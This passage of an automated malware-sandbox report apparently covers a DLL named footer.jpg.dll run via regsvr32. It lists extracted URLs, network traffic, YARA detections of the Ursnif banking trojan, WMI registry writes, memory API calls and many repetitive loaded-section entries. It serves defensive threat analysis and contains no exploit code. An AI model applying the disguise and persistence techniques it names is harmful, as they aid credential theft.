            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/direkt-ins-ohr/ar-BB1dx8gq?ocid=hplocalnews
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/er-hat-uns-zuerst-provoziert-erst-dann-schlug-ich-ihn/ar-BB1dxy
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/fcz-chaot-nach-brutaler-schl%c3%a4gerei-vor-gericht-nicht-das-e
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/juso-reicht-initiative-f%c3%bcr-stadtz%c3%bcrcher-gratis-%c3%b6
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/mordprozess-in-meilen-die-verteidigerin-will-einen-vollumf%c3%a
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%a4ter-ist-gest%c3%a4ndig-und-sagt-er-sei-provoziert-worden
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/weshalb-corona-das-bev%c3%b6lkerungswachstum-im-kanton-z%c3%bcr
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49771 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.1036558565.0000000000FBB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4164, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004014E8 NtCreateSection,memset,1_2_004014E8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0040183B NtMapViewOfSection,1_2_0040183B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004022C5 NtQueryVirtualMemory,1_2_004022C5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04877507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_04877507
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487B2F1 NtQueryVirtualMemory,1_2_0487B2F1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0285 NtProtectVirtualMemory,1_2_00EF0285
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF009C NtAllocateVirtualMemory,1_2_00EF009C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00EF0066 NtAllocateVirtualMemory,1_2_00EF0066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004020A41_2_004020A4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487B0CC1_2_0487B0CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_048723FC1_2_048723FC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0487936B1_2_0487936B
            Source: footer.jpg.dllStatic PE information: invalid certificate
            Source: footer.jpg.dllStatic PE information: Number of sections : 15 > 10
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: footer.jpg.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dllJump to behavior
